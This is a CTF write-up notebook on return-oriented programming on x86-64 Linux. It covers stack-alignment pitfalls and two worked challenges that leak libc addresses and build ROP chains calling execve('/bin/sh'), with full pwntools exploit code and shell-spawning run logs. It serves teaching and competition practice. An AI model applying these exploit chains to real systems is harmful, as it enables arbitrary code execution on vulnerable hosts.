# ROP (return oriented programming)

## Reference

- https://github.com/xairy/easy-linux-pwn
- https://ropemporium.com/guide.html
- https://i.blackhat.com/briefings/asia/2018/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/rop.md

## Pitfalls

### Stack Alignment

Make sure the stack pointer is correctly aligned for the target architecture. The 64 bit calling convention requires the stack (the `rsp`) to be 16-byte aligned. Otherwise, segfault comes from nowhere. For exmaple, the `movaps` instruction in `buffered_vfprintf()` or `do_system()` may cause segfault.

## Example: pwn

Source: pku-geekgame-0th

In [1]:
bin_filename = './pwn'
from pwn import *
from pwnlib import gdb

context.terminal = ['tmux', 'new-window']
elf = ELF(bin_filename)
context.arch = elf.arch

libc_filename = './libc-2.31.so'
libc = ELF(libc_filename)

[*] '/ctf/work/rop/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/ctf/work/rop/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled


In [2]:
# +1: beacuse the lowest byte happens to be 0x00, which can not be printed by put()
putchar_offset = +1

def payload0():
    rop = ROP(elf)
    rop.call('puts', [elf.got['putchar'] + putchar_offset])
    # rop.raw(rop.search()) # align
    rop.call('run')
    print(rop.dump())
    craft = flat(
        b'a' * 0x80,
        p64(0),      # rbp
        rop.chain()
    )
    assert not b'\n' in craft
    assert not b' ' in craft
    assert not b'\t' in craft
    return craft
payload0()

[*] Loaded 14 cached gadgets for './pwn'
0x0000:         0x4013c3 pop rdi; ret
0x0008:         0x404019 [arg0] rdi = 4210713
0x0010:         0x401040 puts
0x0018:         0x4011ce run()


b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x13@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00@\x10@\x00\x00\x00\x00\x00\xce\x11@\x00\x00\x00\x00\x00'

In [3]:
!one_gadget {libc_filename}

0xe6c7e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6c81 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6c84 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL


In [4]:
def payload1(putchar_addr):
    libc.address = 0
    libc.address = putchar_addr - libc.sym['putchar']
    print(f'{hex(libc.address)=}')
    rop = ROP([elf, libc])
    binsh = next(libc.search(b"/bin/sh\x00"))
    rop.execve(binsh, 0, 0)
    print(rop.dump())
    craft = flat(
        b'a' * 0x80,
        p64(0),      # rbp
        rop.chain()
    )
    assert not b'\n' in craft
    assert not b' ' in craft
    assert not b'\t' in craft
    return craft
payload1(0xff_0015_0000)

hex(libc.address)='0xff000c6c00'
[*] Loaded 201 cached gadgets for './libc-2.31.so'
0x0000:     0xff001e2f71 pop rdx; pop r12; ret
0x0008:              0x0 [arg2] rdx = 0
0x0010:      b'eaaafaaa' <pad r12>
0x0018:     0xff000ee129 pop rsi; ret
0x0020:              0x0 [arg1] rsi = 0
0x0028:         0x4013c3 pop rdi; ret
0x0030:     0xff0027e1aa [arg0] rdi = 1095219274154
0x0038:     0xff001acef0 execve


b"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00\x00\x00\x00\x00\x00\x00\x00q/\x1e\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eaaafaaa)\xe1\x0e\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x13@\x00\x00\x00\x00\x00\xaa\xe1'\x00\xff\x00\x00\x00\xf0\xce\x1a\x00\xff\x00\x00\x00"

In [5]:
def exploit(io: tube):
    io.sendline(b'100')
    io.sendline(payload0())
    io.recvuntil(b'aaaaaa\n')
    putchar_addr = int.from_bytes(b'\x00' * putchar_offset + io.recvline(keepends=False), 'little')
    print(f"{hex(putchar_addr)=}")
    io.sendline(payload1(putchar_addr))

In [6]:
import os
context.aslr = True
io = process(bin_filename, env = {'LD_PRELOAD': libc_filename})
libc_base = io.libs()[os.path.realpath(libc_filename)]
print(f'{hex(libc_base)=}')
# io = gdb.debug([bin_filename], env = {'LD_PRELOAD': libc_filename}, gdbscript=f"""
# b *0x4012A4
# c
# """)
try:
    exploit(io)
    with context.local(log_level='debug'):
        io.sendline(b'echo flag{here}')
        io.sendline(b'exit')
        print(io.recvall())
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

[x] Starting local process './pwn'
[+] Starting local process './pwn': pid 1690
hex(libc_base)='0x7f9f257d3000'
0x0000:         0x4013c3 pop rdi; ret
0x0008:         0x404019 [arg0] rdi = 4210713
0x0010:         0x401040 puts
0x0018:         0x4011ce run()
hex(putchar_addr)='0x7f9f2585c400'
hex(libc.address)='0x7f9f257d3000'
0x0000:   0x7f9f258ef371 pop rdx; pop r12; ret
0x0008:              0x0 [arg2] rdx = 0
0x0010:      b'eaaafaaa' <pad r12>
0x0018:   0x7f9f257fa529 pop rsi; ret
0x0020:              0x0 [arg1] rsi = 0
0x0028:         0x4013c3 pop rdi; ret
0x0030:   0x7f9f2598a5aa [arg0] rdi = 140321507288490
0x0038:   0x7f9f258b92f0 execve
[DEBUG] Sent 0x10 bytes:
    b'echo flag{here}\n'
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[x] Receiving all data
[x] Receiving all data: 0B
[*] Process './pwn' stopped with exit code 0 (pid 1690)
[DEBUG] Received 0x74 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n'
    b'flag{h

## Example: toosmall

Source: NITECTF 2022

```
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[16]; // [rsp+0h] [rbp-10h] BYREF

  setbuf(_bss_start, 0LL);
  setbuf(stdin, 0LL);
  memset(s, 0, sizeof(s));
  puts("What's your favourite movie?: ");
  read(0, s, 0x100uLL);                     // stack overflow
  printf("Oooh you like %s?\n", s);
  return 0;
}
```

In [7]:
from pwn import *
from pwnlib import gdb

bin_filename = './chall'
elf = ELF(bin_filename)

context.terminal = ['tmux', 'new-window']
context.arch = elf.arch

libc_filename = './libc.so.6'
libc = ELF(libc_filename)

ld_filename = 'ld-linux-x86-64.so.2'

[*] '/ctf/work/rop/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/ctf/work/rop/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled


In [8]:
!cp {bin_filename} {bin_filename}.patch
bin_filename = bin_filename + '.patch'
!patchelf --set-interpreter {ld_filename} {bin_filename}
!patchelf --set-rpath '.' {bin_filename}
elf = ELF(bin_filename)

[*] '/ctf/work/rop/chall.patch'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'.'


Stack content when the program is waiting for user input:

```
00:0000│ rsp 0x7ffc4e1a45f0 ◂— 0x1000
01:0008│     0x7ffc4e1a45f8 —▸ 0x557e15e080e0 (_start) ◂— endbr64
02:0010│ rbp 0x7ffc4e1a4600 ◂— 0x1
03:0018│     0x7ffc4e1a4608 —▸ 0x7f7471924d90 ◂— mov    edi, eax     <----- return address
04:0020│     0x7ffc4e1a4610 ◂— 0x0
05:0028│     0x7ffc4e1a4618 —▸ 0x557e15e081c9 (main) ◂— endbr64
```

```
pwndbg> x/10i 0x7f7471924d90-31
   0x7f7471924d71:      and    eax,0x300
   0x7f7471924d76:      mov    rax,QWORD PTR [rip+0x1ef23b]        # 0x7f7471b13fb8
   0x7f7471924d7d:      mov    edi,DWORD PTR [rsp+0x14]
   0x7f7471924d81:      mov    rsi,QWORD PTR [rsp+0x18]
   0x7f7471924d86:      mov    rdx,QWORD PTR [rax]
   0x7f7471924d89:      mov    rax,QWORD PTR [rsp+0x8]    <----- return to here to call main() again
   0x7f7471924d8e:      call   rax
   0x7f7471924d90:      mov    edi,eax                              <----- return address
```

In [9]:
rop = ROP([elf, libc])
print(rop.rdx)
print(rop.rsi)

[*] Loaded 5 cached gadgets for './chall.patch'
[*] Loaded 218 cached gadgets for './libc.so.6'
Gadget(0x90529, ['pop rdx', 'pop rbx', 'ret'], ['rdx', 'rbx'], 0x18)
Gadget(0x2be51, ['pop rsi', 'ret'], ['rsi'], 0x10)


In [10]:
def exploit(io: tube):
    craft = flat(
        b'a' * 0x10,
        b'a' * 8, # rbp
        p8(0x89)
    )
    io.send(craft)
    io.recvuntil(b'a' * 0x18)
    leak = io.recvline(keepends=False)
    print(leak, len(leak))
    leak = u64(leak[:6] + b'\x00\x00')
    print(f'{hex(leak)=}')
    
    libc_start_main = leak - 0x7f2fad039d89 + 0x7f2fad039dc0
    print(f'{hex(libc_start_main)=}')
    
    libc.address = 0
    libc.address = libc_start_main - libc.sym['__libc_start_main']
    
    rop = ROP(libc)
    binsh = next(libc.search(b"/bin/sh\x00"))
    # rop.rdi = 0
    rop.execve(binsh, 0, 0)
    
    craft = flat(
        b'a' * 0x10,
        b'a' * 8, # rbp
        rop.chain()
    )
    io.recvuntil(b"What's your favourite movie?")
    io.send(craft)
    io.recvuntil(b'a' * 0x18)


In [11]:
import os
context.aslr = True
io = process(bin_filename)
libc_base = io.libs()[os.path.realpath(libc_filename)]
print(f'{hex(libc_base)=}')
# io = gdb.debug([bin_filename], gdbscript=f"""
# b main
# b *(main+148)
# c
# """)
try:
    exploit(io)
    with context.local(log_level='debug'):
        io.sendline(b'echo flag{here}')
        io.sendline(b'exit')
        print(io.recvall())
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

[x] Starting local process './chall.patch'
[+] Starting local process './chall.patch': pid 1697
hex(libc_base)='0x7f6c8a238000'
b'\x89\x1d&\x8al\x7f?' 7
hex(leak)='0x7f6c8a261d89'
hex(libc_start_main)='0x7f6c8a261dc0'
[DEBUG] Sent 0x10 bytes:
    b'echo flag{here}\n'
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[x] Receiving all data
[x] Receiving all data: 8B
[*] Process './chall.patch' stopped with exit code 0 (pid 1697)
[DEBUG] Received 0xb bytes:
    b'flag{here}\n'
[x] Receiving all data: 19B
[+] Receiving all data: Done (19B)
b'\x97t5\x8al\x7f?\nflag{here}\n'
